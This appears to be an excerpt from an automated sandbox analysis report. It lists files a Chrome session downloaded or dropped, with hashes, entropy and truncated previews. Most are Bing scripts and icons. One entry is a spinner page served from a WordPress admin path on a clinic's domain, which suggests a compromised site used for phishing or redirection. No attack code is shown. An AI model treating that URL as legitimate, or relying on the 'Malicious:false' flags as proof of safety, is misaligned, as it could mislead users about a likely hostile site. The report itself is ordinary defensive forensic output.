                                                                                                      SHA-512:96FD8D92BA98B65B4BD34FF57F351123EA907C3DC91A4814F8DE3E6985B6BC9CA0972F8E6CBEE072F50742CA5F19D03F623C32EB5061C9CA1D6A3CFB47344DCE
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/IdEISQ9wmRcno7BEmDNCUXM2tT8.js
                                                                                                      Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (502), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):502
                                                                                                      Entropy (8bit):5.078627125695514
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:282xHX+NOrStq65B8tq/PLI65iO65ByZ06865/R8d8A:28QHuNO21M+P1CCfVn8d8A
                                                                                                      MD5:33B0493E193496ABB6F24298B1562942
                                                                                                      SHA1:026C85720DD57A98F479BA54925AC7E2AAE213BC
                                                                                                      SHA-256:AFAE8511DA5EF94E3B805A7648B6453185484BB817CE33602FFC57FEDC07EE2B
                                                                                                      SHA-512:343096C5EC178E808AD4BBAC5F4AE4065EC1F0847338A0E6BDCBD5A413AFCA114A1DE88EFA309EE9FDFDD3D46DF7D688CBB2F128FC6C29BB8B316EB0B81D0FAF
                                                                                                      Malicious:false
                                                                                                      Preview:var SydneyFSCDecouple;(function(n){function i(){var n,i=(n=_w._sydPayWallConfig)===null||n===void 0?void 0:n.loadSydneyConvResWithPayWall;i?sj_evt.bind("waitlistUpdate:eligible",t,!0):t()}function t(){n.setSydFSCEligibleState(!0)}function r(n){typeof SydFSCHelper!="undefined"&&SydFSCHelper.setSydFSCEligibleState?SydFSCHelper.setSydFSCEligibleState(!0):(_w.SydFSCHelper=_w.SydFSCHelper||{},_w.SydFSCHelper.isSydFSCEligible=n)}n.setSydFSCEligibleState=r;i()})(SydneyFSCDecouple||(SydneyFSCDecouple={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (5738), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):5738
                                                                                                      Entropy (8bit):5.114371070471245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:xYLyztiz5XwxTbVvI2NxsHQH56PkYveiekeBekebVejeIIvAybIgE3UyfI0syxHz:2z5gxTdNxsHQH568YveiekeBeke5ejeY
                                                                                                      MD5:2937C6DCAD55E5E4A67945F4F803C7CD
                                                                                                      SHA1:27399487B23109021F178841013D476F92B057C6
                                                                                                      SHA-256:ACB0819704DDC4062D6A3B565BA7FE999FEF298778B4B56C284E8F1BEBF3C9B7
                                                                                                      SHA-512:2C07163F841A09D2061AF35C7183984475247CE50A9000B4B2B0B5240701A64B140ECA99853238DB08BB94E9B9368BDFFFE9E83185EDA1745FB02E6F81110D3A
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/JzmUh7IxCQIfF4hBAT1Hb5KwV8Y.js
                                                                                                      Preview:var Chevrons;(function(n){function s(){f=null;t=null;e=!1;o=!1}function a(n,t,i,r,u,f){var e,o=function(n,t,i,r,f){return new l(n,t,i,r,u,f)};typeof SmartRendering!="undefined"?SmartRendering.LoadElementWhenDisplayed(this,_ge(n),o,[n,t,i,r]):o.apply(this,[n,t,i,r,f]);(e=window.ChevronsPoleWheel||window.ChevronsPoleWheelCF)===null||e===void 0?void 0:e.init({container:_ge(n),btnPrev:t,btnNext:i})}var i="disabled",h="hidden",r="darkchv",u="exp",c="expd",t=null,f=null,e=!1,o=!1,l=function(){function n(n,t,i,r,f,e){var o=this;this.controlId=n;this.prevSlideBtn=t;this.nextSlideBtn=i;this.tabbable=r;this.enableGradientDisappear=f;this.nextChevronOverlay=_ge(e+"_chevron_overlay_next");this.prevChevronOverlay=_ge(e+"_chevron_overlay_prev");this.onPrevClick(function(){var n="slideexp_slideprev",t="Prev",i=Lib.CssClass.contains(o.prevSlideBtn,u);i&&(Lib.CssClass.remove(o.prevSlideBtn,u),Lib.CssClass.add(o.prevSlideBtn,c),n="slideexp_expandleft",t="ExpandLeft");sj_evt.fire(n,o.controlId);Log.Log(t
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1614
                                                                                                      Entropy (8bit):7.8244061031886245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mAaDK9jIctS6TyvTJNxoYd/BHyXmPxG1ynvA8FDyVL0MJIFZ/TyOLcxm3mbZ6mQA:mAaDKGg7TyLddFh5GHL0MaZTypb4ba1
                                                                                                      MD5:F8B531C208D8985DA7C66FB1FA0B5274
                                                                                                      SHA1:FB56E32D7E99F00915693AB0FEA930580FC85AB0
                                                                                                      SHA-256:CADFA6AF0EAE29E39F468C015A93CFA565D2E7575C2151012EFA529E750AA2AF
                                                                                                      SHA-512:F8EBCB69B231A191B1EC321B725400BAF44AF3F9A1A87DC82D08669EB9AE920FEB98615E1BBA497D1DA7521E39A93EBC078F70386C140C4A93E3400B365485C5
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.Vkl.U..ZD;.....*."..@-X.1.6.....~.#Twgggv...(.).5..R.....;3....R.....Z...i0Q....sg/.....|...=..=..s3..0..a........!.XO.th.A..m........VV~.WXu..A....v.'.|.n....+..7....T...Y:<..|.|..~2u..9[;.rJ._.x.%tx|Ar.S.~.s.m...@@...r."........C...<yvM|...0U]..EP.go.... .*.{,..n/.._7.2~..^A....Z....2.J?\.a.Z....'*....!.?>....'b`1bp..u./28..:hqG.P..#.*Z..J....&.J........QbyU.b*.[@n3..%6.E..8G..w.@.V....:[..m#h'.i..9.........`9..!.....7g.j.A.}X..$...j.<#xg.B..j...v..5|.Ib....2H.,...H.....M.-..b4..X...(..lIM./B.~.B.0y;..?..A.$...M..........\........e;.q.y...4Xo....$..C.E.u<.d.h@.:7i.X.a.....p.....`.mV)..^^bk.....`!.,.V*.7....~'......0fj@;|>.ub..!.A....J..6..^.-.......y..$.X.......\.u...z.`...Q.~.V...Q..C.M....f...[.de|.U...~.bp......a...a.H...rB(......a...X. ....X...%OG....sI...u......|..~.o....I.r....Q.......Z3.....<Z..}|A.6.1....b..h`...._.B...9...-.._./?.xy/r..Q.#@.......
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (32333)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):50356
                                                                                                      Entropy (8bit):5.4830446880793495
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:okuL2ym/YIZE2u16tNz14nO2s2jXiO7JUDWvjygz+YI2QFSOc+YIXFWCPP6bzATq:9EbiSjyK4FWCqbwONiYb55RD
                                                                                                      MD5:272A6BE497D852049619442E24EC54FF
                                                                                                      SHA1:3B630261FF3F33C5F9C5C2A27FD86C3AD84E8051
                                                                                                      SHA-256:FE7F89C56EE0D81F049552FE32AA99DB28C2D7542853A13795BB42CCAA2A1E4E
                                                                                                      SHA-512:A1BF3F08597255067D1832B6BD9FBE324F9D59BF0E53C6DD308E5B0BB212E3D23CD23548F4EB8DDAF61A6D633533CBF575B754BD22DA0403EB6E3CD45259D1C1
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/images/sbi?mmasync=1&ig=B069B1C3FA1E46A99EACBEDDA65DEBFC&iid=.5098&ptn=Web&ep=0&iconpl=1
                                                                                                      Preview:<style type="text/css">#sbiarea,#sbicom{display:none}.hassbi #sbiarea{display:inline-block}#sbiarea{margin:0 0 0 18px}.sbox #sb_form #sbiarea{margin:0}#sb_sbi{display:inline-block;cursor:pointer}img#sbi_b{vertical-align:-2px;height:18px;width:18px}#detailPage #detailheader img#sbi_b,.blue2#miniheader img#sbi_b,.sbox img#sbi_b{vertical-align:-3px}.blue2#miniheader img#sbi_b{vertical-align:-1px}#sbi_b.grayscaled{filter:grayscale(1) brightness(1.4);-webkit-filter:grayscale(1) brightness(1.4)}#sbi_b.grayscaled:hover{filter:grayscale(1) brightness(1);-webkit-filter:grayscale(1) brightness(1)}#sb_sbip[shdlg] #sbi_b{filter:grayscale(0);-webkit-filter:grayscale(0)}#sb_sbip .rms_iac{display:inline-block}#sb_sbip:not(.disableTooltip):hover::before,#sb_sbip.shtip:not(.disableTooltip)::before,#sb_sbip[vptest]::before{bottom:-27px;left:10px;z-index:6}#sb_sbip:not(.disableTooltip):hover::after,#sb_sbip.shtip:not(.disableTooltip)::after,#sb_sbip[vptest]::after{top:40px;left:10px;z-index:4}#hp_contain
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):282
                                                                                                      Entropy (8bit):4.768675821769942
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:tbXH4mc4sl3UY7eERI1+N9H5R0MLERIwoVNdJMvdIXyCWfuBIAFfu:tbH41niB1+bj0MLBnpavdqyVGBIAFm
                                                                                                      MD5:E38795B634154EC1FF41C6BCDA54EE52
                                                                                                      SHA1:16C6BF388D00A650A75685C671AF002CEA344B4B
                                                                                                      SHA-256:66B589F920473F0FD69C45C8E3C93A95BB456B219CBA3D52873F2A3A1880F3F0
                                                                                                      SHA-512:DCA2E67C46CFF1B9BE39CE8B0D83C34173E6B77EC08FA4EB4BA18A4555144523C570D785549FED7A9909C2E2C3B48D705B6E332832CA4D5DE424B5F7C3CD59BE
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg
                                                                                                      Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">.. <path d="M0 0h16v16h-16z" fill="none"/>.. <path d="M8 1a7 7 0 1 0 7 7 7 7 0 0 0-7-7zm1 10a1 1 0 0 1-2 0v-3a1 1 0 0 1 2 0zm-.293-5.293a1 1 0 1 1 .293-.707 1 1 0 0 1-.293.707z" fill="#767676"/>..</svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1392
                                                                                                      Entropy (8bit):7.796320976198958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zq00gh1w5R9UprEcf8jNNRwGEjJxSxcwV4/sukfm6OgRatsqDq0gcd6SUM:zqzm1wJqSLRwjjexjysukKsqDEc8m
                                                                                                      MD5:C5350436C66BC4E4C10F70BAF13DC4CA
                                                                                                      SHA1:0E77A216A7CFE0A335A1D9B5B30436CD9F9C1EC3
                                                                                                      SHA-256:A1664675270300CFAE5417D39B21CDF7005A6200BDA135CA8F978620FBBE93CD
                                                                                                      SHA-512:8798F8C560B43ECCE6E1B5406A5366E2F8DB46FDB34AADCD6A5D7566CD0F4BFA53695393874BC1381D8C57B4AE103A99362E3AB1DB29A3A05C7ABC7CBC9229F6
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.0487136c-9717-4c2c-acde-9914f4282920&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.VKl.U.}v.6........DP.."....hf...qb.Om..*.....).....HQYWP(..4........I.I`..~.uI........V.....i.y.{.w,..H..}.T.........!ra..r."b.`TX3.a-b......Gi!z..]0~.Kb9.._...W.kW..A..1a....|PX...u.Dj..\..@.,.w#.".h.D....gb....w".^..9D..6....Q\..........K.6.....1o..0;.{....$?"....ZE..Q1p..^.....(..=.G...^..4..... ..<o...h........K.5.z....4.C.!..].;..*..A.....q....F.Z..U....1r.g........8.....^F. `.[.].hUP..?.^..k...R.....'p...K.N...H...J9.LZ...k.E..j.3.!.!.>.s|@.mE...=9L.~.;S.._.m.J..\j...B...6..F....V.hC...v......'.8..aL8.g..i.Zm_kSaw...}.,..eQ."g.iY2.w.L.w....._,.11.U)..........a*..1o.j...s.k.=W...i..EY.?.#.....w.k6....e..D.Y/b..mx......Vh77...7..1.t(Z..0...Z..a/..."`....n..<.R.....(.).S..h.p.%.yN.l .p.3...p...M.i.9{H.P...9..a..3.H.{L...A.4..ZK3.W..~\.=,.//.3X...>.Z.L%:...6........9.......v..8..Y..Y..X......."..`+...U{.|.....).bX.w}#..H...v.s.....Sp...!Y...=:...7..a.YR...i...c7..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):964
                                                                                                      Entropy (8bit):4.421237058266115
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t741nTY2jmYXhgauOwgXl3gHuWg9cZLzix9QiVCVCTikxQmQ6Nkpgeoo7:dQnkwXhnuOwIlwHuW7nC9QkaUzQm3Nk5
                                                                                                      MD5:88E3ED3DD7EEE133F73FFB9D36B04B6F
                                                                                                      SHA1:518B54603727D68665146F987C13F3E7DCDE8D82
                                                                                                      SHA-256:A39AB0A67C08D907EDDB18741460399232202C26648D676A22AD06E9C1D874CB
                                                                                                      SHA-512:90FF1284A7FEB9555DFC869644BD5DF8A022AE7873547292D8F6A31BA0808613B6A7F23CB416572ADB298EEE0998E0270B78F41C619D84AB379D0CA9D1D9DA6B
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg
                                                                                                      Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16"><g fill="#00809D"><path d="M2.25 0h-1.25c-.263 0-.521.107-.707.293-.186.186-.293.444-.293.707v1.25c0 .552.448 1 1 1s1-.448 1-1v-.25h.25c.552 0 1-.448 1-1s-.448-1-1-1zM1 8.75c.552 0 1-.448 1-1v-1.5c0-.552-.448-1-1-1s-1 .448-1 1v1.5c0 .552.448 1 1 1zM2.25 12h-.25v-.25c0-.552-.448-1-1-1s-1 .448-1 1v1.25c0 .263.107.521.293.707s.444.293.707.293h1.25c.552 0 1-.448 1-1s-.448-1-1-1zM11.75 2h.25v.25c0 .552.448 1 1 1s1-.448 1-1v-1.25c0-.263-.107-.521-.293-.707-.186-.186-.444-.293-.707-.293h-1.25c-.552 0-1 .448-1 1s.448 1 1 1zM6.25 2h1.5c.552 0 1-.448 1-1s-.448-1-1-1h-1.5c-.552 0-1 .448-1 1s.448 1 1 1zM14.5 7h-.5v-.75c0-.552-.448-1-1-1s-1 .448-1 1v.75h-3.5c-.828 0-1.5.671-1.5 1.5v3.5h-.75c-.552 0-1 .448-1 1s.448 1 1 1h.75v.5c0 .828.672 1.5 1.5 1.5h6c.828 0 1.5-.672 1.5-1.5v-6c0-.829-.672-1.5-1.5-1.5z"/></g><path fill="none" d="M0 0h16v16h-16z"/></svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (357), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):357
                                                                                                      Entropy (8bit):5.100320804030099
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:2LGXTMkCDpk6CSVKvxpKv8Ed7fxu7hJRJeGMYS+ePekKfT32PV9m+8mq1mqJFO:2QVlY8EbgRUGhS+eTKb2PVESq8qrO
                                                                                                      MD5:2DF9793CF020A37C88178BE84311427A
                                                                                                      SHA1:29CFE86239722D4F4AF07C494D676092896A8600
                                                                                                      SHA-256:A69D257EEE41E843881D548D2E4EE5A0727B889AB22BFFDAA8ED1074E802BCC6
                                                                                                      SHA-512:E9A35EC1E466FEB3E273FB991A3282BA1C45FD0EACEA956E9821914CC4261377684B062BDE888EBF5767BBC055DB191DC14E00AF8037B5607449C06E5D2DD082
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function r(n){if(n&&(i=0),!(i>60)){i++;var u=_w.CursorProgress||_w.CursorProgressFull;u&&u.bind();t&&sb_ct(t);t=sb_st(r,1e3)}}function n(){r(!0)}var t=null,i=0;n();typeof sj_be!="undefined"&&sj_be(_w,"load",n);typeof sj_evt!="undefined"&&(sj_evt.bind("onP1",n),sj_evt.bind("onP1Lazy",n),sj_evt.bind("ajaxReady",n),sj_evt.bind("ajax.load",n))})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1392
                                                                                                      Entropy (8bit):7.796320976198958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zq00gh1w5R9UprEcf8jNNRwGEjJxSxcwV4/sukfm6OgRatsqDq0gcd6SUM:zqzm1wJqSLRwjjexjysukKsqDEc8m
                                                                                                      MD5:C5350436C66BC4E4C10F70BAF13DC4CA
                                                                                                      SHA1:0E77A216A7CFE0A335A1D9B5B30436CD9F9C1EC3
                                                                                                      SHA-256:A1664675270300CFAE5417D39B21CDF7005A6200BDA135CA8F978620FBBE93CD
                                                                                                      SHA-512:8798F8C560B43ECCE6E1B5406A5366E2F8DB46FDB34AADCD6A5D7566CD0F4BFA53695393874BC1381D8C57B4AE103A99362E3AB1DB29A3A05C7ABC7CBC9229F6
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.VKl.U.}v.6........DP.."....hf...qb.Om..*.....).....HQYWP(..4........I.I`..~.uI........V.....i.y.{.w,..H..}.T.........!ra..r."b.`TX3.a-b......Gi!z..]0~.Kb9.._...W.kW..A..1a....|PX...u.Dj..\..@.,.w#.".h.D....gb....w".^..9D..6....Q\..........K.6.....1o..0;.{....$?"....ZE..Q1p..^.....(..=.G...^..4..... ..<o...h........K.5.z....4.C.!..].;..*..A.....q....F.Z..U....1r.g........8.....^F. `.[.].hUP..?.^..k...R.....'p...K.N...H...J9.LZ...k.E..j.3.!.!.>.s|@.mE...=9L.~.;S.._.m.J..\j...B...6..F....V.hC...v......'.8..aL8.g..i.Zm_kSaw...}.,..eQ."g.iY2.w.L.w....._,.11.U)..........a*..1o.j...s.k.=W...i..EY.?.#.....w.k6....e..D.Y/b..mx......Vh77...7..1.t(Z..0...Z..a/..."`....n..<.R.....(.).S..h.p.%.yN.l .p.3...p...M.i.9{H.P...9..a..3.H.{L...A.4..ZK3.W..~\.=,.//.3X...>.Z.L%:...6........9.......v..8..Y..Y..X......."..`+...U{.|.....).bX.w}#..H...v.s.....Sp...!Y...=:...7..a.YR...i...c7..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1495), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1495
                                                                                                      Entropy (8bit):5.2715271964580745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:7JVCEan7NLRWm8tRWv6lOnRWtFjDPTDRRKXtwBUSbMh0ZkPBoGBYwIlRW3PwTeJF:ANLwHtwWOnwtNjTDGXt0UqMKZYoGBYfc
                                                                                                      MD5:45345F7E8380393CA0C539AE4CFE32BD
                                                                                                      SHA1:292D5F4B184B3FF7178489C01249F37F5CA395A7
                                                                                                      SHA-256:3A40A1FF034448D68D92A75ABABA09BA5F2B71D130F5F6BDF160DCF8851529A9
                                                                                                      SHA-512:2BFD00BF303AD5A1E8413B5EE6A162167605511FEFB8DF61A8F40F80382F5520DF690A53B1058365F1D81562B2668376886D0F829517A642FCD87412801FE987
                                                                                                      Malicious:false
                                                                                                      Preview:function addRemoveListenersOnAll(){var t=_ge("b_content"),n,i,r;t&&(n=_d.createElement("STYLE"),n.id=styleIdString,n.innerText="#b_results h2>a {padding: 16px 40px 0 6px;margin: -16px -40px 0 -6px;}",_d.head&&_d.head.appendChild(n),i=t.getElementsByClassName("b_ad"),i&&AddRemoveListener(i),r=t.getElementsByClassName("b_algo"),r&&AddRemoveListener(r))}function AddRemoveListener(n){for(var t,i,u=n.length,r=0;r<u;r++)if(t=n[r].getElementsByTagName("CITE"),t&&t.length>0)for(i=0;i<t.length;i++)sj_be(t[i],"click",algo_c)}function mouseMoveAfterTouchHandler(){sj_ue(document,"mousemove",mouseMoveAfterTouchHandler);var n=_d.getElementById(styleIdString);n&&n.parentNode&&n.parentNode.removeChild(n);sj_log("CI.TTC","mouse","started");sj_ue(document,"mousemove",mouseMoveAfterTouchHandler)}function touchStartHandlerAll(n){n.pointerType==="touch"&&(addRemoveListenersOnAll(),sj_log("CI.TTC","touch","started"),sj_ue(document,"pointerdown",touchStartHandlerAll),document.addEventListener("mousemove",mou
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2308
                                                                                                      Entropy (8bit):7.899179387795881
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:EYzupuaC/kR4ajNJXnekFKhb2WNmjBreMXTohjl3hOmPQ91J0t:EYzuHbTek82f16MXTobpPQXyt
                                                                                                      MD5:9CFE604BB54DC224E1EC11134B92620B
                                                                                                      SHA1:4CC290BD68046125F4883A69538FC3097B6A493F
                                                                                                      SHA-256:7FD2B0AEAAF40451CD44B87FD01F51E5321DCC44786259C295BA4F608083834F
                                                                                                      SHA-512:B8525D24478AF19E56ADC234DA14F55B53B199E35381D44807A720C113CED27DC4BD01D894A3FEC439CB9F8618C40AEAE3FA7E6C057CD545377FE9AFFB926BA6
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.W{.T..'.......cwvfgw....@.......b.4..H.I.?.u.6.Zl.4&<Z.X_(TbSk.......QK. ..{.3s......;.i.s...s........).p..f4....T6.H....J...S./....l.L.-]WAk...=..M..t{...f......(Gc[>.r.C.Zt...w.@.....z.P.......L..x%.....Z....w.N.l.8w..K@=.....a.'X........2.p.V...'...H...=..L.#:....Vg...........{.x.....|...\.Ku......H.W..*.....|.X....ep#.@.$..I q|..J.k..ec.#.\l...kQ..4.c...?.d4...7..;6..e.Q...(h.2cp5....w."....s....p+........E6....H.L6.!.(.....mG..Q8."`...1......I../...).?....{.D.0...;z.$.2.C.fv".D.u0....K..Wcr......N.@.....q>..0....0.. ....'...f....GL.A...fq..kUx..[.~..OG`/\.*.>6;.L.......`.>L..*..........5^o..-].'.;......a/].j0..Y].).P_......8U.<.....e5..Qa]..5...i...O.2....+`0..f...P..B...y(o.....p.x1..O.O.W.+..f.4.}.$..Q8..F.....-a.......H.u8W.- E.6.O......r..J./>.w.r.\s4.......I.`.&..# .n.y..jx.._..)..!....:..$`...0. ...7`.^..cQ.x..IH.'.5Z."}.^...)...k....@
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:53:43], progressive, precision 8, 160x160, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4934
                                                                                                      Entropy (8bit):7.782095567670307
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sHbZoNWsmjRgjXFQvdXNkuz4nicDWk+4Nf6Q2mKwADHfXC7OWn:sFmmjGjWddkuz4nicyktAtmtAbuLn
                                                                                                      MD5:FDA2CEAE0679611937E6E71F701A36AB
                                                                                                      SHA1:75B98D4B8E7142F0F57620296354F61C4C6F3A8F
                                                                                                      SHA-256:B818C1E9B0B46CCCDC158ACA581C3C5F4A9BD3DDA380DA03AF52F43F14F5651E
                                                                                                      SHA-512:904100EBE310AFDF86C2E4C9CBDDC118178D41B45D076BB6077DB8F3BCED8B3CEDF545CE079E39B6F8034C2247FD4C824C0522B6221E3CDC02423AF8EEB9F8A3
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:53:43....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................._..Z/9.....AhY...T0*!Eu,..dk.....y. .LP.B..V..m@@f....<uf.......h...)8.2j..*U...<.n....4.B.-....W..^.J..o.{.....z.....".s.,.S...;...^f<.O8,>u.s...n.)....\o..6.{.=#:(.F.;..;1].V.........U5.1..W..g7|r5..==...Hy..h....@...KV.{.l.9.........F.S....N{9.Y..(C.f..u\..&OX..-..N..w\..(.:.1..:ldGW.q.!...mo...e.=........a2..:hkA.....Z.:r}.....Z[...../\...-..A.#..E-K.5..k........]....yQhiAF........cy.[...C..qg.j.Y..Q3.Uh(..X.>kjs..5.....=.M.J.m.Q...FE.m=s..>.WSv..J..42+....V..[....n,.h..5...\.I]...%T.0k.=...h..5.td....].@.\..^.r....d.f..[....k....0*E.U..H.....G...]]Z.M.Y..-..I....%.......................
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (1329), with CRLF line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2099
                                                                                                      Entropy (8bit):5.405722601007948
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5r8LfPllLgT8reDFCwbEh8FSPTFjsBmFNIoFC2UFL0F3FzYM8888888USNGQgsgk:54fdST8CDAwbEuQrSBmnIoA2Up0JJ880
                                                                                                      MD5:BE04049C5CF8641DCFF399D874777918
                                                                                                      SHA1:64E92C48B6D6A71447E2F16467AC72C4E4370FA9
                                                                                                      SHA-256:C5FE832F48F170C7A5F837C501892FA471B2248BBD833588A0724750D6F964DF
                                                                                                      SHA-512:0F213A149A171FF59FA6E4F2E3B5D0EE6224C984696D6EB705FF18DC82CF7AA2DA7BDD3D89193658A03F3C64036CFBE0F5D14ACA584754A77477B2B543C2C7FB
                                                                                                      Malicious:false
                                                                                                      URL:https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Preview:<html>...<head>....<meta name="robots" content="noindex, nofollow">....<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">....<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.affect {position: relative;width: 80px;height: 80px;}.affect div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite affect;transform-origin: 40px 40px;}.affect div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #737373;margin: -4px 0 0 -4px;}.affect div:first-child {animation-delay: -36ms;}.affect div:first-child:after {top: 63px;left: 63px;}.affect div:nth-child(2) {animation-delay: -72ms;}.affect div:nth-child(2):after {top: 68px;left: 56px;}.affect div:nth-child(3) {animation-delay: -108ms;}.affect div:nth-child(3):after {top: 71px;left: 48px;}.affect div:nth-child(4) {animation-delay: -144ms;}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1039), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1039
                                                                                                      Entropy (8bit):5.394520629964255
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AaV1T141S2BjoljiHXdX4daXOcRWOkDqBlg:AK41PjEjiHKKwOjXg
                                                                                                      MD5:16050BAAF39976A33AC9F854D5EFDB32
                                                                                                      SHA1:94725020EFA7D3EE8FAED2B7DFFC5A4106363B5E
                                                                                                      SHA-256:039E6B3DF1D67341FB8E4A3815F0D1BB3292A2040334CEB9CFC4A8D6ABF2FB55
                                                                                                      SHA-512:CF0D54F0368FFBC6908216FD2573DF8F5FE4C34AC08E17301B8734B3FABC674672A7F456707F632F82F44B36812DAD8A0CF81A51D5CEA21EA7F0E18500298375
                                                                                                      Malicious:false
